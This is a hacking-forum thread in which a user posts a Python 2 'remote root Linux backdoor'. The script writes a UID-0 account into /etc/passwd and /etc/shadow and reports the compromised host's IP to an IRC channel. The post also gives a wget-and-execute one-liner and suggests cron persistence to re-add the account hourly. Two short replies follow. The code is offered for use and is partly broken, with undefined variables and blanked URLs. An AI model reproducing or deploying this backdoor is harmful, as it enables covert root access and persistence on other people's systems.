chevron_left chevron_right
Login Register invert_colors photo_library

Stay updated and chat with others! - Join the Discord!
Thread Rating:
  • 0 Vote(s) - 0 Average
Thread Closed 

python remote root Linux backdoor filter_list
python remote root Linux backdoor #1

import crypt
import subprocess
import string
import socket
import time
import random
import sys
import os

#config the following shit

USERNAME = "kibo"

PASSWORD = "kibo_backdoor"
SALT = "changeme"

SHELL = "/bin/bash"

CHANNEL = "#changeme"
PORT = 6667

#end of config

def main():
    passwd = open("/etc/passwd", "a+")
    passwd.write("{0}:x:0:0:root:{1}:{2}".format(USERNAME, HOME_DIRECTORY, SHELL))
    shadow_root_ln = ""
    for x in open("/etc/shadow", "a+").read().split("\n"):
        if "root" in x:
            shadow_root_ln += x

    shadow_root_ln_split = shadow_root_ln.split(":")
    shadow_root_ln_split[0] = USERNAME
    shadow_root_ln_split[1] = crypt.crypt(PASSWORD, "$6${0}".format(SALT))

    shadow_string = ""
    for x in shadow_root_ln_split:
        shadow_string += x+":"
    shadow_string = shadow_string[:-1]
    open("/etc/shadow", "a+").write("{0}\n".format(shadow_string))

    p = subprocess.Popen(["curl", ""], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = p.communicate()

    username = ''.join(random.choice(string.ascii_uppercase+string.ascii_lowercase) for _ in range(8))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((SERVER, PORT))
    sock.send("USER {0} {0} {0} :ilovedicklol\n".format(username))
    sock.send("NICK {0}\n".format(username))
    sock.send("JOIN {0}\n".format(CHANNEL))
    sock.send("PRIVMSG {0} :rooted box available: {1}\n".format(CHANNEL, out))

if __name__ == "__main__":

how this works is it creates a user by creating new entries in /etc/passwd and /etc/shadow
then connecting to a given irc server and channel and then retrieving the ip of the target box and sending it in the irc channel
also, this depends on python2
don't try it with python3
anyway yeah this is pretty simple and is in no way supposed to be secure or hidden

here's a oneliner if you need to backdoor a box superfast speed:
wget -o /tmp/; chmod +x /tmp/; /tmp/

you could also put this oneliner into a cron job to make sure the account gets added every hour should it be removed

give suggestions of improvement or whatever
(This post was last modified: 08-28-2015, 11:50 PM by Oneiiros.)

RE: python remote root Linux backdoor #2
Such terrible programmers on this site

RE: python remote root Linux backdoor #3
(02-21-2016, 11:25 AM)SynthMesc Wrote: Such terrible programmers on this site

Please refrain from grave-digging, @SynthMesc

Closing this thread.
Public Key & Bitcoin
Tox: B540063A92D12D13788EBBD72F5574422F311FBCC7112B74154491762C000354C8BF60024BC5

Users browsing this thread: 1 Guest(s)